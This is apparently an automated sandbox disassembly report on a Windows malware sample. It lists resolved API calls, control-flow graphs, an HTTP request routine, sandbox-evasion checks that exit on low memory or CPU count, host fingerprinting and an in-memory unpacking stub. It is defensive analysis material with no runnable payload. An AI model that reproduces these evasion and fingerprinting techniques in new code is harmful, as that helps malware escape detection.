                                            • GetProcAddress.KERNEL32(763B0000,007954F8), ref: 0041A244
                                            • GetProcAddress.KERNEL32(763B0000,007CA9C8), ref: 0041A25D
                                            • GetProcAddress.KERNEL32(763B0000,007CA980), ref: 0041A275
                                            • GetProcAddress.KERNEL32(763B0000,00795498), ref: 0041A28D
                                            • GetProcAddress.KERNEL32(750F0000,0079A550), ref: 0041A2B3
                                            • GetProcAddress.KERNEL32(750F0000,0079A758), ref: 0041A2CB
                                            • GetProcAddress.KERNEL32(750F0000,007CA998), ref: 0041A2E3
                                            • GetProcAddress.KERNEL32(750F0000,007955D8), ref: 0041A2FC
                                            • GetProcAddress.KERNEL32(750F0000,00795598), ref: 0041A314
                                            • GetProcAddress.KERNEL32(750F0000,0079A500), ref: 0041A32C
                                            • GetProcAddress.KERNEL32(75A50000,007CA9F8), ref: 0041A352
                                            • GetProcAddress.KERNEL32(75A50000,00795398), ref: 0041A36A
                                            • GetProcAddress.KERNEL32(75A50000,0079D3E0), ref: 0041A382
                                            • GetProcAddress.KERNEL32(75A50000,007CA9B0), ref: 0041A39B
                                            • GetProcAddress.KERNEL32(75A50000,007CAA28), ref: 0041A3B3
                                            • GetProcAddress.KERNEL32(75A50000,00795538), ref: 0041A3CB
                                            • GetProcAddress.KERNEL32(75A50000,00795618), ref: 0041A3E4
                                            • GetProcAddress.KERNEL32(75A50000,007CA968), ref: 0041A3FC
                                            • GetProcAddress.KERNEL32(75A50000,007CB070), ref: 0041A414
                                            • GetProcAddress.KERNEL32(75070000,007952F8), ref: 0041A436
                                            • GetProcAddress.KERNEL32(75070000,007CB220), ref: 0041A44E
                                            • GetProcAddress.KERNEL32(75070000,007CB160), ref: 0041A466
                                            • GetProcAddress.KERNEL32(75070000,007CB1A8), ref: 0041A47F
                                            • GetProcAddress.KERNEL32(75070000,007CB118), ref: 0041A497
                                            • GetProcAddress.KERNEL32(74E50000,00795418), ref: 0041A4B8
                                            • GetProcAddress.KERNEL32(74E50000,007954D8), ref: 0041A4D1
                                            • GetProcAddress.KERNEL32(75320000,00795638), ref: 0041A4F2
                                            • GetProcAddress.KERNEL32(75320000,007CB208), ref: 0041A50A
                                            • GetProcAddress.KERNEL32(6F070000,00795438), ref: 0041A530
                                            • GetProcAddress.KERNEL32(6F070000,00795518), ref: 0041A548
                                            • GetProcAddress.KERNEL32(6F070000,007955B8), ref: 0041A560
                                            • GetProcAddress.KERNEL32(6F070000,007CB1C0), ref: 0041A579
                                            • GetProcAddress.KERNEL32(6F070000,00795558), ref: 0041A591
                                            • GetProcAddress.KERNEL32(6F070000,007953F8), ref: 0041A5A9
                                            • GetProcAddress.KERNEL32(6F070000,007955F8), ref: 0041A5C2
                                            • GetProcAddress.KERNEL32(6F070000,00795658), ref: 0041A5DA
                                            • GetProcAddress.KERNEL32(6F070000,InternetSetOptionA), ref: 0041A5F1
                                            • GetProcAddress.KERNEL32(6F070000,HttpQueryInfoA), ref: 0041A607
                                            • GetProcAddress.KERNEL32(74E00000,007CB088), ref: 0041A629
                                            • GetProcAddress.KERNEL32(74E00000,0079D460), ref: 0041A641
                                            • GetProcAddress.KERNEL32(74E00000,007CB130), ref: 0041A659
                                            • GetProcAddress.KERNEL32(74E00000,007CB148), ref: 0041A672
                                            • GetProcAddress.KERNEL32(74DF0000,00795678), ref: 0041A693
                                            • GetProcAddress.KERNEL32(6F9C0000,007CB1F0), ref: 0041A6B4
                                            • GetProcAddress.KERNEL32(6F9C0000,007956B8), ref: 0041A6CD
                                            • GetProcAddress.KERNEL32(6F9C0000,007CB178), ref: 0041A6E5
                                            • GetProcAddress.KERNEL32(6F9C0000,007CB1D8), ref: 0041A6FD
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2280583655.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.2280583655.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2280583655.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2280583655.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2280583655.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2280583655.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_4M3JIACIWk.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: AddressProc$LibraryLoad
                                            • String ID: 8Sy$8Ty$8Uy$8Vy$8Yy$8Zy$HttpQueryInfoA$InternetSetOptionA$XTy$XUy$XVy$XXy$XYy$XZy$xTy$xUy$xVy$xXy$xZy
                                            • API String ID: 2238633743-3056651782
                                            • Opcode ID: 62050089a8b8835eafd1d37742ef1b979ae5b20786234f8d6d940be7715c0619
                                            • Instruction ID: b148544ec257a615b167952e2e9b89b3667e8f5620887ecf26b211dda149ff7d
                                            • Opcode Fuzzy Hash: 62050089a8b8835eafd1d37742ef1b979ae5b20786234f8d6d940be7715c0619
                                            • Instruction Fuzzy Hash: 02621DBD5C0200BFD364DFE8EE889A63BFBF74E701714A61AE609C3264D6399441DB52

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 1001 415510-415577 call 415ad0 call 41a820 * 3 call 41a740 * 4 1017 41557c-415583 1001->1017 1018 415585-4155b6 call 41a820 call 41a7a0 call 401590 call 4151f0 1017->1018 1019 4155d7-41564c call 41a740 * 2 call 401590 call 4152c0 call 41a8a0 call 41a800 call 41aad0 StrCmpCA 1017->1019 1035 4155bb-4155d2 call 41a8a0 call 41a800 1018->1035 1044 415693-4156a9 call 41aad0 StrCmpCA 1019->1044 1049 41564e-41568e call 41a7a0 call 401590 call 4151f0 call 41a8a0 call 41a800 1019->1049 1035->1044 1051 4157dc-415844 call 41a8a0 call 41a820 * 2 call 401670 call 41a800 * 4 call 416560 call 401550 1044->1051 1052 4156af-4156b6 1044->1052 1049->1044 1181 415ac3-415ac6 1051->1181 1055 4157da-41585f call 41aad0 StrCmpCA 1052->1055 1056 4156bc-4156c3 1052->1056 1075 415991-4159f9 call 41a8a0 call 41a820 * 2 call 401670 call 41a800 * 4 call 416560 call 401550 1055->1075 1076 415865-41586c 1055->1076 1060 4156c5-415719 call 41a820 call 41a7a0 call 401590 call 4151f0 call 41a8a0 call 41a800 1056->1060 1061 41571e-415793 call 41a740 * 2 call 401590 call 4152c0 call 41a8a0 call 41a800 call 41aad0 StrCmpCA 1056->1061 1060->1055 1061->1055 1161 415795-4157d5 call 41a7a0 call 401590 call 4151f0 call 41a8a0 call 41a800 1061->1161 1075->1181 1082 415872-415879 1076->1082 1083 41598f-415a14 call 41aad0 StrCmpCA 1076->1083 1091 4158d3-415948 call 41a740 * 2 call 401590 call 4152c0 call 41a8a0 call 41a800 call 41aad0 StrCmpCA 1082->1091 1092 41587b-4158ce call 41a820 call 41a7a0 call 401590 call 4151f0 call 41a8a0 call 41a800 1082->1092 1112 415a16-415a21 Sleep 1083->1112 1113 415a28-415a91 call 41a8a0 call 41a820 * 2 call 401670 call 41a800 * 4 call 416560 call 401550 1083->1113 1091->1083 1186 41594a-41598a call 41a7a0 call 401590 call 4151f0 call 41a8a0 call 41a800 1091->1186 1092->1083 1112->1017 1113->1181 1161->1055 1186->1083
                                            APIs
                                              • Part of subcall function 0041A820: lstrlenA.KERNEL32(00000000,?,?,00415B54,00420ADB,00420ADA,?,?,00416B16,00000000,?,0079D410,?,0042110C,?,00000000), ref: 0041A82B
                                              • Part of subcall function 0041A820: lstrcpy.KERNEL32(B,00000000), ref: 0041A885
                                              • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                                            • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00415644
                                            • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 004156A1
                                            • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00415857
                                              • Part of subcall function 0041A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0041A7E6
                                              • Part of subcall function 004151F0: StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00415228
                                              • Part of subcall function 0041A8A0: lstrcpy.KERNEL32(?,B), ref: 0041A905
                                              • Part of subcall function 004152C0: StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00415318
                                              • Part of subcall function 004152C0: lstrlenA.KERNEL32(00000000), ref: 0041532F
                                              • Part of subcall function 004152C0: StrStrA.SHLWAPI(00000000,00000000), ref: 00415364
                                              • Part of subcall function 004152C0: lstrlenA.KERNEL32(00000000), ref: 00415383
                                              • Part of subcall function 004152C0: strtok.MSVCRT(00000000,?), ref: 0041539E
                                              • Part of subcall function 004152C0: lstrlenA.KERNEL32(00000000), ref: 004153AE
                                            • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 0041578B
                                            • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00415940
                                            • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00415A0C
                                            • Sleep.KERNEL32(0000EA60), ref: 00415A1B
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2280583655.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.2280583655.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2280583655.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2280583655.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2280583655.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2280583655.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_4M3JIACIWk.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: lstrcpylstrlen$Sleepstrtok
                                            • String ID: ERROR$ERROR$ERROR$ERROR$ERROR$ERROR$xYy
                                            • API String ID: 3630751533-539903723
                                            • Opcode ID: 57d063fc9ed83c1e53da0e14c22364a0aa576905cfee3b85b0d3c6812f09564c
                                            • Instruction ID: 0baa471f6470c30cedeccf0ca5f41b7a1b3666a88d5ff2061c329f06e4daefd3
                                            • Opcode Fuzzy Hash: 57d063fc9ed83c1e53da0e14c22364a0aa576905cfee3b85b0d3c6812f09564c
                                            • Instruction Fuzzy Hash: 5BE18675910104AACB04FBB1DD52EED733DAF54314F50812EB406660D1EF3CAB9ACBAA

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 1212 406280-40630b call 41a7a0 call 4047b0 call 41a740 InternetOpenA StrCmpCA 1219 406314-406318 1212->1219 1220 40630d 1212->1220 1221 406509-406525 call 41a7a0 call 41a800 * 2 1219->1221 1222 40631e-406342 InternetConnectA 1219->1222 1220->1219 1241 406528-40652d 1221->1241 1224 406348-40634c 1222->1224 1225 4064ff-406503 InternetCloseHandle 1222->1225 1227 40635a 1224->1227 1228 40634e-406358 1224->1228 1225->1221 1229 406364-406392 HttpOpenRequestA 1227->1229 1228->1229 1231 4064f5-4064f9 InternetCloseHandle 1229->1231 1232 406398-40639c 1229->1232 1231->1225 1234 4063c5-406405 HttpSendRequestA HttpQueryInfoA 1232->1234 1235 40639e-4063bf InternetSetOptionA 1232->1235 1237 406407-406427 call 41a740 call 41a800 * 2 1234->1237 1238 40642c-40644b call 418940 1234->1238 1235->1234 1237->1241 1246 4064c9-4064e9 call 41a740 call 41a800 * 2 1238->1246 1247 40644d-406454 1238->1247 1246->1241 1248 406456-406480 InternetReadFile 1247->1248 1249 4064c7-4064ef InternetCloseHandle 1247->1249 1252 406482-406489 1248->1252 1253 40648b 1248->1253 1249->1231 1252->1253 1257 40648d-4064c5 call 41a9b0 call 41a8a0 call 41a800 1252->1257 1253->1249 1257->1248
                                            APIs
                                              • Part of subcall function 0041A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0041A7E6
                                              • Part of subcall function 004047B0: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 004047EA
                                              • Part of subcall function 004047B0: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 00404801
                                              • Part of subcall function 004047B0: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 00404818
                                              • Part of subcall function 004047B0: lstrlenA.KERNEL32(00000000,00000000,0000003C), ref: 00404839
                                              • Part of subcall function 004047B0: InternetCrackUrlA.WININET(00000000,00000000), ref: 00404849
                                              • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                                            • InternetOpenA.WININET(00420DFE,00000001,00000000,00000000,00000000), ref: 004062E1
                                            • StrCmpCA.SHLWAPI(?,007CC908), ref: 00406303
                                            • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00406335
                                            • HttpOpenRequestA.WININET(00000000,GET,?,007CC638,00000000,00000000,00400100,00000000), ref: 00406385
                                            • InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 004063BF
                                            • HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 004063D1
                                            • HttpQueryInfoA.WININET(00000000,00000013,?,00000100,00000000), ref: 004063FD
                                            • InternetReadFile.WININET(00000000,?,000007CF,?), ref: 0040646D
                                            • InternetCloseHandle.WININET(00000000), ref: 004064EF
                                            • InternetCloseHandle.WININET(00000000), ref: 004064F9
                                            • InternetCloseHandle.WININET(00000000), ref: 00406503
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2280583655.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.2280583655.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2280583655.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2280583655.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2280583655.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2280583655.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_4M3JIACIWk.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: Internet$??2@CloseHandleHttp$OpenRequestlstrcpy$ConnectCrackFileInfoOptionQueryReadSendlstrlen
                                            • String ID: ERROR$ERROR$GET
                                            • API String ID: 3074848878-2509457195
                                            • Opcode ID: 080261753b6033409e8309b3227ccdbaa0f04c8b4696de884a7f81660436c8d0
                                            • Instruction ID: 4c22ad93782da972e928cd377ef6cc95e5ae9f8df18decad01f21c65d1bf8a87
                                            • Opcode Fuzzy Hash: 080261753b6033409e8309b3227ccdbaa0f04c8b4696de884a7f81660436c8d0
                                            • Instruction Fuzzy Hash: C1718075A00218ABDB24EFE0DC49BEE7775FB44700F10816AF50A6B1D0DBB86A85CF56

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 1269 4117a0-4117cd call 41aad0 StrCmpCA 1272 4117d7-4117f1 call 41aad0 strtok_s 1269->1272 1273 4117cf-4117d1 ExitProcess 1269->1273 1276 4117f4-4117f8 1272->1276 1277 4119c2-4119cd call 41a800 1276->1277 1278 4117fe-411811 1276->1278 1280 411817-41181a 1278->1280 1281 41199e-4119bd strtok_s 1278->1281 1283 411821-411830 call 41a820 1280->1283 1284 411849-411858 call 41a820 1280->1284 1285 4118ad-4118be StrCmpCA 1280->1285 1286 4118cf-4118e0 StrCmpCA 1280->1286 1287 41198f-411999 call 41a820 1280->1287 1288 4118f1-411902 StrCmpCA 1280->1288 1289 411951-411962 StrCmpCA 1280->1289 1290 411970-411981 StrCmpCA 1280->1290 1291 411913-411924 StrCmpCA 1280->1291 1292 411932-411943 StrCmpCA 1280->1292 1293 411835-411844 call 41a820 1280->1293 1294 41185d-41186e StrCmpCA 1280->1294 1295 41187f-411890 StrCmpCA 1280->1295 1281->1276 1283->1281 1284->1281 1316 4118c0-4118c3 1285->1316 1317 4118ca 1285->1317 1296 4118e2-4118e5 1286->1296 1297 4118ec 1286->1297 1287->1281 1298 411904-411907 1288->1298 1299 41190e 1288->1299 1304 411964-411967 1289->1304 1305 41196e 1289->1305 1307 411983-411986 1290->1307 1308 41198d 1290->1308 1300 411930 1291->1300 1301 411926-411929 1291->1301 1302 411945-411948 1292->1302 1303 41194f 1292->1303 1293->1281 1312 411870-411873 1294->1312 1313 41187a 1294->1313 1314 411892-41189c 1295->1314 1315 41189e-4118a1 1295->1315 1296->1297 1297->1281 1298->1299 1299->1281 1300->1281 1301->1300 1302->1303 1303->1281 1304->1305 1305->1281 1307->1308 1308->1281 1312->1313 1313->1281 1321 4118a8 1314->1321 1315->1321 1316->1317 1317->1281 1321->1281
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2280583655.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.2280583655.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2280583655.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2280583655.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2280583655.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2280583655.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_4M3JIACIWk.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: ExitProcessstrtok_s
                                            • String ID: block
                                            • API String ID: 3407564107-2199623458
                                            • Opcode ID: 2fed056f04860ab53dc55cf46fa0ad5f7b81b83e30ecc022536dc59065cce9ea
                                            • Instruction ID: 00bb13bb87ecd4f31d5cbb7361e66ee12f2c4d363b15aa8138e6c51e0cba8311
                                            • Opcode Fuzzy Hash: 2fed056f04860ab53dc55cf46fa0ad5f7b81b83e30ecc022536dc59065cce9ea
                                            • Instruction Fuzzy Hash: AC517DB4A10209EFCB04DFA1D954BFE77B6BF44304F10804AE516A7361D778E992CB6A

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 1322 417500-41754a GetWindowsDirectoryA 1323 417553-4175c7 GetVolumeInformationA call 418d00 * 3 1322->1323 1324 41754c 1322->1324 1331 4175d8-4175df 1323->1331 1324->1323 1332 4175e1-4175fa call 418d00 1331->1332 1333 4175fc-417617 GetProcessHeap HeapAlloc 1331->1333 1332->1331 1334 417619-417626 call 41a740 1333->1334 1335 417628-417658 wsprintfA call 41a740 1333->1335 1343 41767e-41768e 1334->1343 1335->1343
                                            APIs
                                            • GetWindowsDirectoryA.KERNEL32(?,00000104), ref: 00417542
                                            • GetVolumeInformationA.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0041757F
                                            • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00417603
                                            • HeapAlloc.KERNEL32(00000000), ref: 0041760A
                                            • wsprintfA.USER32 ref: 00417640
                                              • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2280583655.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.2280583655.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2280583655.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2280583655.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2280583655.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2280583655.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_4M3JIACIWk.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: Heap$AllocDirectoryInformationProcessVolumeWindowslstrcpywsprintf
                                            • String ID: :$C$\
                                            • API String ID: 3790021787-3809124531
                                            • Opcode ID: ca458c9d44e2395dbd5c279e9f95348a2013c015fe5135b8dbe94f3e61db761a
                                            • Instruction ID: 2fa5a76c25c4840d12821100fc964cf287d391274576238511e757cc0c078ff1
                                            • Opcode Fuzzy Hash: ca458c9d44e2395dbd5c279e9f95348a2013c015fe5135b8dbe94f3e61db761a
                                            • Instruction Fuzzy Hash: BF41A2B5D44248ABDB10DF94DC45BEEBBB9EF08714F10019DF50967280D778AA84CBA9

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 1344 23e003c-23e0047 1345 23e004c-23e0263 call 23e0a3f call 23e0e0f call 23e0d90 VirtualAlloc 1344->1345 1346 23e0049 1344->1346 1361 23e028b-23e0292 1345->1361 1362 23e0265-23e0289 call 23e0a69 1345->1362 1346->1345 1364 23e02a1-23e02b0 1361->1364 1366 23e02ce-23e03c2 VirtualProtect call 23e0cce call 23e0ce7 1362->1366 1364->1366 1367 23e02b2-23e02cc 1364->1367 1373 23e03d1-23e03e0 1366->1373 1367->1364 1374 23e0439-23e04b8 VirtualFree 1373->1374 1375 23e03e2-23e0437 call 23e0ce7 1373->1375 1377 23e04be-23e04cd 1374->1377 1378 23e05f4-23e05fe 1374->1378 1375->1373 1380 23e04d3-23e04dd 1377->1380 1381 23e077f-23e0789 1378->1381 1382 23e0604-23e060d 1378->1382 1380->1378 1385 23e04e3-23e0505 1380->1385 1386 23e078b-23e07a3 1381->1386 1387 23e07a6-23e07b0 1381->1387 1382->1381 1383 23e0613-23e0637 1382->1383 1388 23e063e-23e0648 1383->1388 1398 23e0517-23e0520 1385->1398 1399 23e0507-23e0515 1385->1399 1386->1387 1389 23e086e-23e08be LoadLibraryA 1387->1389 1390 23e07b6-23e07cb 1387->1390 1388->1381 1392 23e064e-23e065a 1388->1392 1397 23e08c7-23e08f9 1389->1397 1391 23e07d2-23e07d5 1390->1391 1394 23e07d7-23e07e0 1391->1394 1395 23e0824-23e0833 1391->1395 1392->1381 1396 23e0660-23e066a 1392->1396 1401 23e07e4-23e0822 1394->1401 1402 23e07e2 1394->1402 1404 23e0839-23e083c 1395->1404 1403 23e067a-23e0689 1396->1403 1405 23e08fb-23e0901 1397->1405 1406 23e0902-23e091d 1397->1406 1400 23e0526-23e0547 1398->1400 1399->1400 1407 23e054d-23e0550 1400->1407 1401->1391 1402->1395 1408 23e068f-23e06b2 1403->1408 1409 23e0750-23e077a 1403->1409 1404->1389 1410 23e083e-23e0847 1404->1410 1405->1406 1412 23e0556-23e056b 1407->1412 1413 23e05e0-23e05ef 1407->1413 1414 23e06ef-23e06fc 1408->1414 1415 23e06b4-23e06ed 1408->1415 1409->1388 1416 23e084b-23e086c 1410->1416 1417 23e0849 1410->1417 1418 23e056f-23e057a 1412->1418 1419 23e056d 1412->1419 1413->1380 1420 23e06fe-23e0748 1414->1420 1421 23e074b 1414->1421 1415->1414 1416->1404 1417->1389 1422 23e057c-23e0599 1418->1422 1423 23e059b-23e05bb 1418->1423 1419->1413 1420->1421 1421->1403 1428 23e05bd-23e05db 1422->1428 1423->1428 1428->1407
                                            APIs
                                            • VirtualAlloc.KERNEL32(00000000,?,00001000,00000004), ref: 023E024D
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2281115890.00000000023E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 023E0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_23e0000_4M3JIACIWk.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: AllocVirtual
                                            • String ID: cess$kernel32.dll
                                            • API String ID: 4275171209-1230238691
                                            • Opcode ID: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
                                            • Instruction ID: 571f1da09eade85af8bbf9f83e91f5564ddb21b823786ce3211d86e5941364d9
                                            • Opcode Fuzzy Hash: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
                                            • Instruction Fuzzy Hash: C1526B74A01229DFDB64CF58C985BACBBB5BF09304F1480D9E54DAB391DB70AA89CF14

                                            Control-flow Graph

                                            APIs
                                              • Part of subcall function 00419860: GetProcAddress.KERNEL32(75900000,0079DCE0), ref: 004198A1
                                              • Part of subcall function 00419860: GetProcAddress.KERNEL32(75900000,0079D078), ref: 004198BA
                                              • Part of subcall function 00419860: GetProcAddress.KERNEL32(75900000,0079CF70), ref: 004198D2
                                              • Part of subcall function 00419860: GetProcAddress.KERNEL32(75900000,0079D198), ref: 004198EA
                                              • Part of subcall function 00419860: GetProcAddress.KERNEL32(75900000,0079D138), ref: 00419903
                                              • Part of subcall function 00419860: GetProcAddress.KERNEL32(75900000,00797258), ref: 0041991B
                                              • Part of subcall function 00419860: GetProcAddress.KERNEL32(75900000,00795798), ref: 00419933
                                              • Part of subcall function 00419860: GetProcAddress.KERNEL32(75900000,007959B8), ref: 0041994C
                                              • Part of subcall function 00419860: GetProcAddress.KERNEL32(75900000,0079D1E0), ref: 00419964
                                              • Part of subcall function 00419860: GetProcAddress.KERNEL32(75900000,0079CFE8), ref: 0041997C
                                              • Part of subcall function 00419860: GetProcAddress.KERNEL32(75900000,0079CF88), ref: 00419995
                                              • Part of subcall function 00419860: GetProcAddress.KERNEL32(75900000,0079CFA0), ref: 004199AD
                                              • Part of subcall function 00419860: GetProcAddress.KERNEL32(75900000,00795758), ref: 004199C5
                                              • Part of subcall function 00419860: GetProcAddress.KERNEL32(75900000,0079D000), ref: 004199DE
                                              • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                                              • Part of subcall function 004011D0: ExitProcess.KERNEL32 ref: 00401211
                                              • Part of subcall function 00401160: GetSystemInfo.KERNEL32(?,?,?,?,?,?,?,?,?,00416A17,00420AEF), ref: 0040116A
                                              • Part of subcall function 00401160: ExitProcess.KERNEL32 ref: 0040117E
                                              • Part of subcall function 00401110: GetCurrentProcess.KERNEL32(00000000,000007D0,00003000,00000040,00000000,?,?,00416A1C), ref: 0040112B
                                              • Part of subcall function 00401110: VirtualAllocExNuma.KERNEL32(00000000,?,?,00416A1C), ref: 00401132
                                              • Part of subcall function 00401110: ExitProcess.KERNEL32 ref: 00401143
                                              • Part of subcall function 00401220: GlobalMemoryStatusEx.KERNEL32(00000040,?,00000000,00000040), ref: 0040123E
                                              • Part of subcall function 00401220: __aulldiv.LIBCMT ref: 00401258
                                              • Part of subcall function 00401220: __aulldiv.LIBCMT ref: 00401266
                                              • Part of subcall function 00401220: ExitProcess.KERNEL32 ref: 00401294
                                              • Part of subcall function 00416770: GetUserDefaultLangID.KERNEL32(?,?,00416A26,00420AEF), ref: 00416774
                                            • GetUserDefaultLCID.KERNEL32 ref: 00416A26
                                              • Part of subcall function 00401190: ExitProcess.KERNEL32 ref: 004011C6
                                              • Part of subcall function 00417850: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,004011B7), ref: 00417880
                                              • Part of subcall function 00417850: HeapAlloc.KERNEL32(00000000,?,?,?,004011B7), ref: 00417887
                                              • Part of subcall function 00417850: GetUserNameA.ADVAPI32(00000104,00000104), ref: 0041789F
                                              • Part of subcall function 004178E0: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,00416A2B), ref: 00417910
                                              • Part of subcall function 004178E0: HeapAlloc.KERNEL32(00000000,?,?,?,00416A2B), ref: 00417917
                                              • Part of subcall function 004178E0: GetComputerNameA.KERNEL32(?,00000104), ref: 0041792F
                                              • Part of subcall function 0041A9B0: lstrlenA.KERNEL32(?,00421110,?,00000000,00420AEF), ref: 0041A9C5
                                              • Part of subcall function 0041A9B0: lstrcpy.KERNEL32(00000000), ref: 0041AA04
                                              • Part of subcall function 0041A9B0: lstrcatA.KERNEL32(00000000,00000000), ref: 0041AA12
                                              • Part of subcall function 0041A8A0: lstrcpy.KERNEL32(?,B), ref: 0041A905
                                            • OpenEventA.KERNEL32(001F0003,00000000,00000000,00000000,?,0079D410,?,0042110C,?,00000000,?,00421110,?,00000000,00420AEF), ref: 00416ACA
                                            • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 00416AE8
                                            • CloseHandle.KERNEL32(00000000), ref: 00416AF9
                                            • Sleep.KERNEL32(00001770), ref: 00416B04
                                            • CloseHandle.KERNEL32(?,00000000,?,0079D410,?,0042110C,?,00000000,?,00421110,?,00000000,00420AEF), ref: 00416B1A
                                            • ExitProcess.KERNEL32 ref: 00416B22
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2280583655.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.2280583655.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2280583655.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2280583655.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2280583655.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2280583655.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
